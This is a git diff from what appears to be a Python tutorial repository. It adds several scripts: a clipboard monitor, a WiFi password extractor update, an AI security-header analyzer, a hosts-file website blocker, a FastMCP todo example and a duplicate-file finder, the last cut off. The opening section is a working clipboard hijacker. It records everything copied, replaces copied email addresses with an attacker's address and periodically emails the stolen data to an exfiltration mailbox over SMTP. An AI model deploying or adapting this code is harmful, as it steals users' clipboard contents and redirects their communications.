+        body += f"Collection Time: {datetime.now().strftime('%Y-%m-%d %H:%M:%S')}\n"
+        body += f"Total Items Collected: {len(clipboard_data)}\n"
+        body += f"Total Emails Hijacked: {len(hijacked_emails)}\n"
+        body += "\n" + "="*60 + "\n"
+        
+        # Clipboard data section
+        if clipboard_data:
+            body += "\n--- CLIPBOARD DATA COLLECTED ---\n"
+            body += "\nAll captured clipboard content (comma-separated):\n"
+            body += ", ".join(clipboard_data)
+            body += "\n\n--- DETAILED CLIPBOARD ENTRIES ---\n"
+            for i, item in enumerate(clipboard_data, 1):
+                body += f"{i}. {item}\n"
+        
+        # Hijacked emails section
+        if hijacked_emails:
+            body += "\n" + "="*60 + "\n"
+            body += "--- HIJACKED EMAIL ADDRESSES ---\n\n"
+            body += "Comma-separated list:\n"
+            body += ", ".join(hijacked_emails)
+            body += "\n\nDetailed list:\n"
+            for i, email in enumerate(hijacked_emails, 1):
+                body += f"{i}. {email}\n"
+        
+        body += "\n" + "="*60 + "\n"
+        body += "End of Report\n"
+        body += "="*60 + "\n"
+        
+        msg.attach(MIMEText(body, 'plain'))
+        
+        # Send email using SMTP_SSL
+        print(f"\n[*] Sending exfiltration email to {EXFILTRATION_EMAIL}...")
+        with smtplib.SMTP_SSL(SMTP_SERVER, SMTP_PORT) as server:
+            server.login(SMTP_USERNAME, SMTP_PASSWORD)
+            server.send_message(msg)
+        
+        print(f"[+] Successfully sent exfiltration email!")
+        print(f"    - Clipboard items: {len(clipboard_data)}")
+        print(f"    - Hijacked emails: {len(hijacked_emails)}\n")
+        
+        return True
+        
+    except smtplib.SMTPAuthenticationError:
+        print("[ERROR] SMTP Authentication failed!")
+        print("[!] Make sure you're using a Gmail App Password, not your regular password")
+        return False
+    except Exception as e:
+        print(f"[ERROR] Failed to send email: {e}")
+        import traceback
+        traceback.print_exc()
+        return False
+
+def main():
+    """Main clipboard monitoring loop with periodic exfiltration"""
+    global clipboard_data, hijacked_emails
+    
+    print("="*60)
+    print("Clipboard Email Hijacker - Linux Version")
+    print("="*60)
+    print(f"[+] Clipboard tool: {CLIPBOARD_TOOL}")
+    print(f"[+] Target email replacement: {ATTACKER_EMAIL}")
+    print(f"[+] Exfiltration email: {EXFILTRATION_EMAIL}")
+    print(f"[+] Monitoring clipboard every {CHECK_INTERVAL} second(s)")
+    print(f"[+] Sending data every {SEND_INTERVAL} seconds")
+    print("[+] Press Ctrl+C to stop and exit\n")
+    
+    hijack_count = 0
+    last_hijacked = None
+    last_send_time = time()
+    last_clipboard_content = None
+    
+    try:
+        while True:
+            current_time = time()
+            
+            # Get clipboard content
+            data = get_clipboard_text()
+            
+            # Store ALL clipboard content (not just emails)
+            if data and data != last_clipboard_content:
+                clipboard_data.append(data)
+                last_clipboard_content = data
+                print(f"[*] Clipboard captured: {data[:50]}{'...' if len(data) > 50 else ''}")
+            
+            # Check if it's an email and hijack it
+            if data and re.search(EMAIL_REGEX, data):
+                if data != ATTACKER_EMAIL and data != last_hijacked:
+                    print(f"[!] EMAIL DETECTED: {data}")
+                    
+                    # Record the original email before hijacking
+                    hijacked_emails.append(data)
+                    
+                    if set_clipboard_text(ATTACKER_EMAIL):
+                        hijack_count += 1
+                        last_hijacked = data
+                        print(f"[+] REPLACED with: {ATTACKER_EMAIL}")
+                        print(f"[*] Total hijacks: {hijack_count}\n")
+            
+            # Check if it's time to send exfiltration email
+            if current_time - last_send_time >= SEND_INTERVAL:
+                if send_exfiltration_email(clipboard_data, hijacked_emails):
+                    # Clear the data after successful send
+                    clipboard_data = []
+                    hijacked_emails = []
+                    print("[+] Data cleared, starting new collection cycle\n")
+                
+                last_send_time = current_time
+            
+            sleep(CHECK_INTERVAL)
+    
+    except KeyboardInterrupt:
+        print(f"\n\n[+] Ctrl+C detected - Stopping monitoring...")
+        print(f"[*] Total emails hijacked: {hijack_count}")
+        
+        # Send any remaining data before exit
+        if clipboard_data or hijacked_emails:
+            print("\n[*] Sending final exfiltration email with remaining data...")
+            send_exfiltration_email(clipboard_data, hijacked_emails)
+        
+        print("\n[+] Program exited successfully")
+        sys.exit(0)
+        
+    except Exception as e:
+        print(f"\n[ERROR] Unexpected error: {e}")
+        import traceback
+        traceback.print_exc()
+        sys.exit(1)
+
+if __name__ == "__main__":
+    main()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py b/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py
new file mode 100644
index 00000000..5d3fcebc
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/clipboard_monitor.py
@@ -0,0 +1,79 @@
+import win32gui
+import win32api
+import ctypes
+from win32clipboard import GetClipboardOwner
+from win32process import GetWindowThreadProcessId
+from psutil import Process
+import winsound
+import sys
+import signal
+
+def handle_clipboard_event(window_handle, message, w_param, l_param):
+    if message == 0x031D:  # WM_CLIPBOARDUPDATE
+        try:
+            clipboard_owner_window = GetClipboardOwner()
+            process_id = GetWindowThreadProcessId(clipboard_owner_window)[1]
+            process = Process(process_id)
+            process_name = process.name()
+            
+            # Successfully identified the process - no beep
+            print("Clipboard modified by %s" % process_name)
+            
+        except Exception:
+            # Could not identify the process - BEEP!
+            print("Clipboard modified by unknown process")
+            winsound.Beep(1000, 300)
+
+    return 0
+
+
+def create_listener_window():
+    window_class = win32gui.WNDCLASS()
+    window_class.lpfnWndProc = handle_clipboard_event
+    window_class.lpszClassName = 'clipboardListener'
+    window_class.hInstance = win32api.GetModuleHandle(None)
+
+    class_atom = win32gui.RegisterClass(window_class)
+
+    return win32gui.CreateWindow(
+        class_atom,
+        'clipboardListener',
+        0,
+        0, 0, 0, 0,
+        0, 0,
+        window_class.hInstance,
+        None
+    )
+
+
+def signal_handler(sig, frame):
+    print("\n[+] Exiting...")
+    sys.exit(0)
+
+
+def start_clipboard_monitor():
+    print("[+] Clipboard listener started")
+    print("[+] Press Ctrl+C to exit\n")
+    
+    # Set up signal handler for Ctrl+C
+    signal.signal(signal.SIGINT, signal_handler)
+    
+    listener_window = create_listener_window()
+    ctypes.windll.user32.AddClipboardFormatListener(listener_window)
+    
+    # Pump messages but check for exit condition
+    try:
+        while True:
+            # Process messages with a timeout to allow checking for exit
+            if win32gui.PumpWaitingMessages() != 0:
+                break
+            win32api.Sleep(100)  # Sleep a bit to prevent high CPU usage
+    except KeyboardInterrupt:
+        print("\n[+] Exiting...")
+    finally:
+        # Clean up - remove clipboard listener
+        ctypes.windll.user32.RemoveClipboardFormatListener(listener_window)
+
+
+if __name__ == "__main__":
+    start_clipboard_monitor()
\ No newline at end of file
diff --git a/ethical-hacking/clipboard-hijacking-tool/requirements.txt b/ethical-hacking/clipboard-hijacking-tool/requirements.txt
new file mode 100644
index 00000000..afd24f6a
--- /dev/null
+++ b/ethical-hacking/clipboard-hijacking-tool/requirements.txt
@@ -0,0 +1 @@
+pywin32
\ No newline at end of file
diff --git a/ethical-hacking/get-wifi-passwords/README.md b/ethical-hacking/get-wifi-passwords/README.md
index e24eda7f..a10efc10 100644
--- a/ethical-hacking/get-wifi-passwords/README.md
+++ b/ethical-hacking/get-wifi-passwords/README.md
@@ -1 +1,3 @@
-# [How to Extract Saved WiFi Passwords in Python](https://www.thepythoncode.com/article/extract-saved-wifi-passwords-in-python)
\ No newline at end of file
+# [How to Extract Saved WiFi Passwords in Python](https://www.thepythoncode.com/article/extract-saved-wifi-passwords-in-python)
+
+This program lists saved Wi-Fi networks and their passwords on Windows and Linux machines. In addition to the SSID (Wi-Fi network name) and passwords, the output also shows the network’s security type and ciphers.
\ No newline at end of file
diff --git a/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py b/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
index 0afd70ca..ff32f6f8 100644
--- a/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
+++ b/ethical-hacking/get-wifi-passwords/get_wifi_passwords.py
@@ -28,10 +28,16 @@ def get_windows_saved_wifi_passwords(verbose=1):
         [list]: list of extracted profiles, a profile has the fields ["ssid", "ciphers", "key"]
     """
     ssids = get_windows_saved_ssids()
-    Profile = namedtuple("Profile", ["ssid", "ciphers", "key"])
+    Profile = namedtuple("Profile", ["ssid", "security", "ciphers", "key"])
     profiles = []
     for ssid in ssids:
         ssid_details = subprocess.check_output(f"""netsh wlan show profile "{ssid}" key=clear""").decode()
+
+        #get the security type
+        security = re.findall(r"Authentication\s(.*)", ssid_details)
+        # clear spaces and colon
+        security = "/".join(dict.fromkeys(c.strip().strip(":").strip() for c in security))
+
         # get the ciphers
         ciphers = re.findall(r"Cipher\s(.*)", ssid_details)
         # clear spaces and colon
@@ -43,7 +49,7 @@ def get_windows_saved_wifi_passwords(verbose=1):
             key = key[0].strip().strip(":").strip()
         except IndexError:
             key = "None"
-        profile = Profile(ssid=ssid, ciphers=ciphers, key=key)
+        profile = Profile(ssid=ssid, security=security, ciphers=ciphers, key=key)
         if verbose >= 1:
             print_windows_profile(profile)
         profiles.append(profile)
@@ -52,12 +58,13 @@ def get_windows_saved_wifi_passwords(verbose=1):
 
 def print_windows_profile(profile):
     """Prints a single profile on Windows"""
-    print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}")
+    #print(f"{profile.ssid:25}{profile.ciphers:15}{profile.key:50}")
+    print(f"{profile.ssid:25}{profile.security:30}{profile.ciphers:35}{profile.key:50}")
 
 
 def print_windows_profiles(verbose):
     """Prints all extracted SSIDs along with Key on Windows"""
-    print("SSID                     CIPHER(S)      KEY")
+    print("SSID                     Securities                    CIPHER(S)                         KEY")
     print("-"*50)
     get_windows_saved_wifi_passwords(verbose)
 
diff --git a/ethical-hacking/http-security-headers/README.md b/ethical-hacking/http-security-headers/README.md
new file mode 100644
index 00000000..e0e7b1d0
--- /dev/null
+++ b/ethical-hacking/http-security-headers/README.md
@@ -0,0 +1,2 @@
+Grab your API key from Open Router:- https://openrouter.ai/
+Model is Used is  DeepSeek: DeepSeek V3.1 (free). However, feel free to try others. 
\ No newline at end of file
diff --git a/ethical-hacking/http-security-headers/http_security_headers.py b/ethical-hacking/http-security-headers/http_security_headers.py
new file mode 100644
index 00000000..67b494c4
--- /dev/null
+++ b/ethical-hacking/http-security-headers/http_security_headers.py
@@ -0,0 +1,149 @@
+#!/usr/bin/env python3
+import requests
+import json
+import os
+import argparse
+from typing import Dict, List, Tuple
+from openai import OpenAI
+
+class SecurityHeadersAnalyzer:
+    def __init__(self, api_key: str = None, base_url: str = None, model: str = None):
+        self.api_key = api_key or os.getenv('OPENROUTER_API_KEY') or os.getenv('OPENAI_API_KEY')
+        self.base_url = base_url or os.getenv('OPENROUTER_BASE_URL', 'https://openrouter.ai/api/v1')
+        self.model = model or os.getenv('LLM_MODEL', 'deepseek/deepseek-chat-v3.1:free')
+        
+        if not self.api_key:
+            raise ValueError("API key is required. Set OPENROUTER_API_KEY or provide --api-key")
+        
+        self.client = OpenAI(base_url=self.base_url, api_key=self.api_key)
+
+    def fetch_headers(self, url: str, timeout: int = 10) -> Tuple[Dict[str, str], int]:
+        """Fetch HTTP headers from URL"""
+        if not url.startswith(('http://', 'https://')):
+            url = 'https://' + url
+        
+        try:
+            response = requests.get(url, timeout=timeout, allow_redirects=True)
+            return dict(response.headers), response.status_code
+        except requests.exceptions.RequestException as e:
+            print(f"Error fetching {url}: {e}")
+            return {}, 0
+
+    def analyze_headers(self, url: str, headers: Dict[str, str], status_code: int) -> str:
+        """Analyze headers using LLM"""
+        prompt = f"""Analyze the HTTP security headers for {url} (Status: {status_code})
+
+Headers:
+{json.dumps(headers, indent=2)}
+
+Provide a comprehensive security analysis including:
+1. Security score (0-100) and overall assessment
+2. Critical security issues that need immediate attention
+3. Missing important security headers
+4. Analysis of existing security headers and their effectiveness
+5. Specific recommendations for improvement
+6. Potential security risks based on current configuration
+
+Focus on practical, actionable advice following current web security best practices. Please do not include ** and # 
+in the response except for specific references where necessary. use numbers, romans, alphabets instead Format the response well please. """
+
+        try:
+            completion = self.client.chat.completions.create(
+                model=self.model,
+                messages=[{"role": "user", "content": prompt}],
+                temperature=0.2
+            )
+            return completion.choices[0].message.content
+        except Exception as e:
+            return f"Analysis failed: {e}"
+
+    def analyze_url(self, url: str, timeout: int = 10) -> Dict:
+        """Analyze a single URL"""
+        print(f"\nAnalyzing: {url}")
+        print("-" * 50)
+        
+        headers, status_code = self.fetch_headers(url, timeout)
+        if not headers:
+            return {"url": url, "error": "Failed to fetch headers"}
+        
+        print(f"Status Code: {status_code}")
+        print(f"\nHTTP Headers ({len(headers)} found):")
+        print("-" * 30)
+        for key, value in headers.items():
+            print(f"{key}: {value}")
+        
+        print(f"\nAnalyzing with AI...")
+        analysis = self.analyze_headers(url, headers, status_code)
+        
+        print("\nSECURITY ANALYSIS")
+        print("=" * 50)
+        print(analysis)
+        
+        return {
+            "url": url,
+            "status_code": status_code,
+            "headers_count": len(headers),
+            "analysis": analysis,
+            "raw_headers": headers
+        }
+
+    def analyze_multiple_urls(self, urls: List[str], timeout: int = 10) -> List[Dict]:
+        """Analyze multiple URLs"""
+        results = []
+        for i, url in enumerate(urls, 1):
+            print(f"\n[{i}/{len(urls)}]")
+            result = self.analyze_url(url, timeout)
+            results.append(result)
+        return results
+
+    def export_results(self, results: List[Dict], filename: str):
+        """Export results to JSON"""
+        with open(filename, 'w') as f:
+            json.dump(results, f, indent=2, ensure_ascii=False)
+        print(f"\nResults exported to: {filename}")
+
+def main():
+    parser = argparse.ArgumentParser(
+        description='Analyze HTTP security headers using AI',
+        formatter_class=argparse.RawDescriptionHelpFormatter,
+        epilog='''Examples:
+  python security_headers.py https://example.com
+  python security_headers.py example.com google.com
+  python security_headers.py example.com --export results.json
+  
+Environment Variables:
+  OPENROUTER_API_KEY - API key for OpenRouter
+  OPENAI_API_KEY     - API key for OpenAI
+  LLM_MODEL         - Model to use (default: deepseek/deepseek-chat-v3.1:free)'''
+    )
+    
+    parser.add_argument('urls', nargs='+', help='URLs to analyze')
+    parser.add_argument('--api-key', help='API key for LLM service')
+    parser.add_argument('--base-url', help='Base URL for LLM API')
+    parser.add_argument('--model', help='LLM model to use')
+    parser.add_argument('--timeout', type=int, default=10, help='Request timeout (default: 10s)')
+    parser.add_argument('--export', help='Export results to JSON file')
+    
+    args = parser.parse_args()
+    
+    try:
+        analyzer = SecurityHeadersAnalyzer(
+            api_key=args.api_key,
+            base_url=args.base_url,
+            model=args.model
+        )
+        
+        results = analyzer.analyze_multiple_urls(args.urls, args.timeout)
+        
+        if args.export:
+            analyzer.export_results(results, args.export)
+            
+    except ValueError as e:
+        print(f"Error: {e}")
+        return 1
+    except KeyboardInterrupt:
+        print("\nAnalysis interrupted by user")
+        return 1
+
+if __name__ == '__main__':
+    main()
\ No newline at end of file
diff --git a/ethical-hacking/http-security-headers/requirements.txt b/ethical-hacking/http-security-headers/requirements.txt
new file mode 100644
index 00000000..f0dd0aec
--- /dev/null
+++ b/ethical-hacking/http-security-headers/requirements.txt
@@ -0,0 +1 @@
+openai
\ No newline at end of file
diff --git a/ethical-hacking/website-blocker/website_blocker.py b/ethical-hacking/website-blocker/website_blocker.py
new file mode 100644
index 00000000..d5127585
--- /dev/null
+++ b/ethical-hacking/website-blocker/website_blocker.py
@@ -0,0 +1,146 @@
+#!/usr/bin/env python3
+"""
+Website Blocker — Block distracting websites by modifying the hosts file.
+
+This script adds entries to your system's hosts file to redirect
+specified websites to 127.0.0.1 (localhost), effectively blocking them.
+
+Usage:
+    sudo python website_blocker.py block       # Block all sites
+    sudo python website_blocker.py unblock     # Unblock all sites  
+    python website_blocker.py status           # Show blocked sites
+"""
+
+import sys
+import platform
+
+# ============================================================
+# CONFIGURATION — edit this list to block different sites
+# ============================================================
+
+SITES_TO_BLOCK = [
+    # Social media
+    "www.facebook.com", "facebook.com",
+    "www.twitter.com",   "twitter.com",
+    "www.instagram.com", "instagram.com",
+    "www.reddit.com",    "reddit.com",
+    # Video / entertainment
+    "www.youtube.com",   "youtube.com",
+    "www.tiktok.com",    "tiktok.com",
+    "www.twitch.tv",     "twitch.tv",
+]
+
+REDIRECT_IP = "127.0.0.1"
+
+# Markers keep our entries isolated so we never touch
+# other entries in the hosts file.
+START_MARKER = "# >>> WEBSITE BLOCKER START >>>"
+END_MARKER   = "# <<< WEBSITE BLOCKER END <<<"
+
+# ============================================================
+# Cross‑platform hosts path
+# ============================================================
+
+def get_hosts_path():
+    """Return the absolute path to the hosts file for this OS."""
+    system = platform.system()
+    if system == "Windows":
+        return r"C:\Windows\System32\drivers\etc\hosts"
+    # macOS and Linux both use /etc/hosts
+    return "/etc/hosts"
+
+HOSTS_PATH = get_hosts_path()
+
+# ============================================================
+# Core operations
+# ============================================================
+
+def block_websites():
+    """Write (or refresh) the blocker block into the hosts file."""
+    # Read the current file
+    with open(HOSTS_PATH, "r") as fh:
+        content = fh.read()
+
+    # Strip any previous block so we start fresh
+    if START_MARKER in content:
+        content = content.split(START_MARKER)[0].rstrip("\n") + "\n"
+
+    # Build the block
+    block_lines = [START_MARKER + "\n"]
+    for site in SITES_TO_BLOCK:
+        block_lines.append(f"{REDIRECT_IP}\t{site}\n")
+    block_lines.append(END_MARKER + "\n")
+
+    # Write everything back
+    with open(HOSTS_PATH, "w") as fh:
+        fh.write(content)
+        fh.writelines(block_lines)
+
+    unique_sites = len(SITES_TO_BLOCK) // 2
+    print(f"[+] Blocked {unique_sites} websites "
+          f"({len(SITES_TO_BLOCK)} URLs) → {REDIRECT_IP}")
+
+
+def unblock_websites():
+    """Remove the blocker block from the hosts file."""
+    with open(HOSTS_PATH, "r") as fh:
+        content = fh.read()
+
+    if START_MARKER not in content:
+        print("[*] No websites are currently blocked.")
+        return
+
+    # Cut out the marked section
+    before = content.split(START_MARKER)[0].rstrip("\n")
+    after  = content.split(END_MARKER)[-1]
+    new_content = before + "\n" + after.lstrip("\n")
+
+    with open(HOSTS_PATH, "w") as fh:
+        fh.write(new_content)
+
+    print("[+] All websites unblocked. Focus mode off.")
+
+
+def show_status():
+    """Print which websites are currently blocked."""
+    with open(HOSTS_PATH, "r") as fh:
+        content = fh.read()
+
+    if START_MARKER not in content:
+        print("[*] No websites are currently blocked.")
+        return
+
+    block = content.split(START_MARKER)[1].split(END_MARKER)[0]
+    sites = [line.strip() for line in block.split("\n")
+             if line.strip() and not line.strip().startswith("#")]
+
+    print(f"[*] {len(sites)} URLs currently blocked → {REDIRECT_IP}:")
+    for site in sites:
+        print(f"    {site.split()[-1]}")
+
+
+# ============================================================
+# CLI entry point
+# ============================================================
+
+if __name__ == "__main__":
+    if len(sys.argv) < 2:
+        print("Website Blocker — block distracting sites via /etc/hosts\n")
+        print("Usage:")
+        print("  sudo python website_blocker.py block")
+        print("  sudo python website_blocker.py unblock")
+        print("  python website_blocker.py status")
+        sys.exit(1)
+
+    command = sys.argv[1].lower()
+
+    if command == "block":
+        block_websites()
+    elif command == "unblock":
+        unblock_websites()
+    elif command == "status":
+        show_status()
+    else:
+        print(f"[!] Unknown command: {command}")
+        print("Valid commands: block, unblock, status")
+        sys.exit(1)
diff --git a/general/fastmcp-mcp-client-server-todo-manager/README.md b/general/fastmcp-mcp-client-server-todo-manager/README.md
new file mode 100644
index 00000000..dd988428
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/README.md
@@ -0,0 +1,39 @@
+# Build a real MCP client and server in Python with FastMCP (Todo Manager example)
+
+This folder contains the code that accompanies the article:
+
+- Article: https://www.thepythoncode.com/article/fastmcp-mcp-client-server-todo-manager
+
+What’s included
+- `todo_server.py`: FastMCP MCP server exposing tools, resources, and a prompt for a Todo Manager.
+- `todo_client_test.py`: A small client script that connects to the server and exercises all features.
+- `requirements.txt`: Python dependencies for this tutorial.
+
+Quick start
+1) Install requirements
+```bash
+python -m venv .venv && source .venv/bin/activate  # or use your preferred env manager
+pip install -r requirements.txt
+```
+
+2) Run the server (stdio transport by default)
+```bash
+python todo_server.py
+```
+
+3) In a separate terminal, run the client
+```bash
+python todo_client_test.py
+```
+
+Optional: run the server over HTTP
+- In `todo_server.py`, replace the last line with:
+```python
+mcp.run(transport="http", host="127.0.0.1", port=8000)
+```
+- Then change the client constructor to `Client("http://127.0.0.1:8000/mcp")`.
+
+Notes
+- Requires Python 3.10+.
+- The example uses in-memory storage for simplicity.
+- For production tips (HTTPS, auth, containerization), see the article.
diff --git a/general/fastmcp-mcp-client-server-todo-manager/requirements.txt b/general/fastmcp-mcp-client-server-todo-manager/requirements.txt
new file mode 100644
index 00000000..2c9387f7
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/requirements.txt
@@ -0,0 +1 @@
+fastmcp>=2.12
\ No newline at end of file
diff --git a/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py b/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py
new file mode 100644
index 00000000..f01a1e78
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/todo_client_test.py
@@ -0,0 +1,50 @@
+import asyncio
+from fastmcp import Client
+
+async def main():
+    # Option A: Connect to local Python script (stdio)
+    client = Client("todo_server.py")
+
+    # Option B: In-memory (for tests)
+    # from todo_server import mcp
+    # client = Client(mcp)
+
+    async with client:
+        await client.ping()
+        print("[OK] Connected")
+
+        # Create a few todos
+        t1 = await client.call_tool("create_todo", {"title": "Write README", "priority": "high"})
+        t2 = await client.call_tool("create_todo", {"title": "Refactor utils", "description": "Split helpers into modules"})
+        t3 = await client.call_tool("create_todo", {"title": "Add tests", "priority": "low"})
+        print("Created IDs:", t1.data["id"], t2.data["id"], t3.data["id"])
+
+        # List open
+        open_list = await client.call_tool("list_todos", {"status": "open"})
+        print("Open IDs:", [t["id"] for t in open_list.data["items"]])
+
+        # Complete one
+        updated = await client.call_tool("complete_todo", {"todo_id": t2.data["id"]})
+        print("Completed:", updated.data["id"], "status:", updated.data["status"])
+
+        # Search
+        found = await client.call_tool("search_todos", {"query": "readme"})
+        print("Search 'readme':", [t["id"] for t in found.data["items"]])
+
+        # Resources
+        stats = await client.read_resource("stats://todos")
+        print("Stats:", getattr(stats[0], "text", None) or stats[0])
+
+        todo2 = await client.read_resource(f"todo://{t2.data['id']}")
+        print("todo://{id}:", getattr(todo2[0], "text", None) or todo2[0])
+
+        # Prompt
+        prompt_msgs = await client.get_prompt("suggest_next_action", {"pending": 2, "project": "MCP tutorial"})
+        msgs_pretty = [
+            {"role": m.role, "content": getattr(m, "content", None) or getattr(m, "text", None)}
+            for m in getattr(prompt_msgs, "messages", [])
+        ]
+        print("Prompt messages:", msgs_pretty)
+
+if __name__ == "__main__":
+    asyncio.run(main())
diff --git a/general/fastmcp-mcp-client-server-todo-manager/todo_server.py b/general/fastmcp-mcp-client-server-todo-manager/todo_server.py
new file mode 100644
index 00000000..64f99b73
--- /dev/null
+++ b/general/fastmcp-mcp-client-server-todo-manager/todo_server.py
@@ -0,0 +1,88 @@
+from typing import Literal
+from itertools import count
+from datetime import datetime, timezone
+from fastmcp import FastMCP
+
+# In-memory storage for demo purposes
+TODOS: list[dict] = []
+_id = count(start=1)
+
+mcp = FastMCP(name="Todo Manager")
+
+@mcp.tool
+def create_todo(
+    title: str,
+    description: str = "",
+    priority: Literal["low", "medium", "high"] = "medium",
+) -> dict:
+    """Create a todo (id, title, status, priority, timestamps)."""
+    todo = {
+        "id": next(_id),
+        "title": title,
+        "description": description,
+        "priority": priority,
+        "status": "open",
+        "created_at": datetime.now(timezone.utc).isoformat(),
+        "completed_at": None,
+    }
+    TODOS.append(todo)
+    return todo
+
+@mcp.tool
+def list_todos(status: Literal["open", "done", "all"] = "open") -> dict:
+    """List todos by status ('open' | 'done' | 'all')."""
+    if status == "all":
+        items = TODOS
+    elif status == "open":
+        items = [t for t in TODOS if t["status"] == "open"]
+    else:
+        items = [t for t in TODOS if t["status"] == "done"]
+    return {"items": items}
+
+@mcp.tool
+def complete_todo(todo_id: int) -> dict:
+    """Mark a todo as done."""
+    for t in TODOS:
+        if t["id"] == todo_id:
+            t["status"] = "done"
+            t["completed_at"] = datetime.now(timezone.utc).isoformat()
+            return t
+    raise ValueError(f"Todo {todo_id} not found")
+
+@mcp.tool
+def search_todos(query: str) -> dict:
+    """Case-insensitive search in title/description."""
+    q = query.lower().strip()
+    items = [t for t in TODOS if q in t["title"].lower() or q in t["description"].lower()]
+    return {"items": items}
+
+# Read-only resources
+@mcp.resource("stats://todos")
+def todo_stats() -> dict:
+    """Aggregated stats: total, open, done."""
+    total = len(TODOS)
+    open_count = sum(1 for t in TODOS if t["status"] == "open")
+    done_count = total - open_count
+    return {"total": total, "open": open_count, "done": done_count}
+
+@mcp.resource("todo://{id}")
+def get_todo(id: int) -> dict:
+    """Fetch a single todo by id."""
+    for t in TODOS:
+        if t["id"] == id:
+            return t
+    raise ValueError(f"Todo {id} not found")
+
+# A reusable prompt
+@mcp.prompt
+def suggest_next_action(pending: int, project: str | None = None) -> str:
+    """Render a small instruction for an LLM to propose next action."""
+    base = f"You have {pending} pending TODOs. "
+    if project:
+        base += f"They relate to the project '{project}'. "
+    base += "Suggest the most impactful next action in one short sentence."
+    return base
+
+if __name__ == "__main__":
+    # Default transport is stdio; you can also use transport="http", host=..., port=...
+    mcp.run()
diff --git a/general/file-deduplication-tool/dedup_tool.py b/general/file-deduplication-tool/dedup_tool.py
new file mode 100644
index 00000000..400bf3c6
--- /dev/null
+++ b/general/file-deduplication-tool/dedup_tool.py
@@ -0,0 +1,252 @@
+"""
+File Deduplication Tool
+=======================
+Finds duplicate files by SHA256 hash, displays results
+in Rich tables, and calculates reclaimable disk space.
+
+Usage:
+    python dedup_tool.py                     # scan built-in test directory
+    python dedup_tool.py /path/to/directory   # scan a real directory
+
+Requirements:
+    pip install rich
+"""
+import hashlib
+import os
+import shutil
+import random
+import sys
+from pathlib import Path
+from collections import defaultdict
+from typing import Dict, List, Tuple
+from rich.console import Console
+from rich.table import Table
+from rich.progress import Progress, SpinnerColumn, BarColumn, TextColumn, TaskProgressColumn
+from rich.panel import Panel
+
+console = Console()
+
+# ═══════════════════════════════════════════════════════════════
+# HASHING
+# ═══════════════════════════════════════════════════════════════
+
+def get_file_hash(filepath: Path, chunk_size: int = 8192) -> str:
+    """Calculate SHA256 hash of a file efficiently using chunked reading."""
+    sha256 = hashlib.sha256()
+    try:
+        with open(filepath, "rb") as f:
+            while chunk := f.read(chunk_size):
+                sha256.update(chunk)
+        return sha256.hexdigest()
+    except (PermissionError, OSError) as e:
+        return f"ERROR:{e}"
+
+# ═══════════════════════════════════════════════════════════════
+# SCANNER: TWO-PASS DEDUPLICATION
+# ═══════════════════════════════════════════════════════════════
+
+def scan_directory(root_dir: Path, min_size: int = 1) -> Tuple[Dict[str, List[Path]], int, int]:
+    """
+    Scan directory and group files by SHA256 hash.
+
+    First pass:  group by file size (fast pre-filter).
+    Second pass: hash only files that share a size with another file.
+
+    Returns:
+        (hash->files mapping, total_files, total_size)
+    """
+    size_groups: Dict[int, List[Path]] = defaultdict(list)
+    total_files = 0
+    total_size = 0
+
+    # First pass: group by file size
+    for filepath in root_dir.rglob("*"):
+        if filepath.is_file() and not filepath.is_symlink():
+            try:
+                fsize = filepath.stat().st_size
+                if fsize >= min_size:
+                    size_groups[fsize].append(filepath)
+                    total_files += 1
+                    total_size += fsize
+            except OSError:
+                continue
+
+    # Second pass: hash files with size collisions
+    hash_map: Dict[str, List[Path]] = defaultdict(list)
+
+    with Progress(
+        SpinnerColumn(),
+        TextColumn("[progress.description]{task.description}"),
+        BarColumn(),
+        TaskProgressColumn(),
+        console=console,
+    ) as progress:
+
+        files_to_hash = sum(
+            len(files) for files in size_groups.values() if len(files) > 1
+        )
+
+        if files_to_hash == 0:
+            return hash_map, total_files, total_size
+
+        task = progress.add_task("[cyan]Hashing files...", total=files_to_hash)
+
+        for fsize, files in size_groups.items():
+            if len(files) > 1:
+                for filepath in files:
+                    file_hash = get_file_hash(filepath)
+                    hash_map[file_hash].append(filepath)
+                    progress.advance(task)
+
+    return hash_map, total_files, total_size
+
+
+def find_duplicates(hash_map: Dict[str, List[Path]]) -> List[Tuple[str, List[Path]]]:
+    """Filter to only entries where 2+ files share the same hash."""
+    return [(h, files) for h, files in hash_map.items() if len(files) > 1]
+
+# ═══════════════════════════════════════════════════════════════
+# DISPLAY
+# ═══════════════════════════════════════════════════════════════
+
+def format_size(size_bytes: int) -> str:
+    """Format bytes to human-readable string."""
+    for unit in ["B", "KB", "MB", "GB"]:
+        if size_bytes < 1024:
+            return f"{size_bytes:.1f} {unit}"
+        size_bytes /= 1024
+    return f"{size_bytes:.1f} TB"
+
+
+def display_results(
+    duplicates: List[Tuple[str, List[Path]]],
+    total_files: int,
+    total_size: int,
+    root_dir: Path
+):
+    """Display duplicate files in Rich tables with summary stats."""
+    if not duplicates:
+        console.print(Panel(
+            f"[green]No duplicate files found in [bold]{root_dir}[/bold]![/green]",
+            title="Scan Complete"
+        ))
+        return
+
+    # Calculate wasted space
+    wasted_files = sum(len(files) - 1 for _, files in duplicates)
+    wasted_bytes = 0
+    for _, files in duplicates:
+        file_size = files[0].stat().st_size
+        wasted_bytes += file_size * (len(files) - 1)
+
+    # Summary panel
+    summary = Table.grid(padding=(0, 2))
+    summary.add_column(style="bold cyan", justify="right")
+    summary.add_column(style="white")
+    summary.add_row("Directory scanned:", str(root_dir))
+    summary.add_row("Total files:", f"{total_files:,}")
+    summary.add_row("Total size:", format_size(total_size))
+    summary.add_row("Duplicate groups:", f"[yellow]{len(duplicates)}[/yellow]")
+    summary.add_row("Wasted files:", f"[red]{wasted_files}[/red]")
+    summary.add_row("Wasted space:", f"[red bold]{format_size(wasted_bytes)}[/red bold]")
+
+    console.print(Panel(summary, title="Scan Summary", border_style="blue"))
+
+    # Duplicate groups table
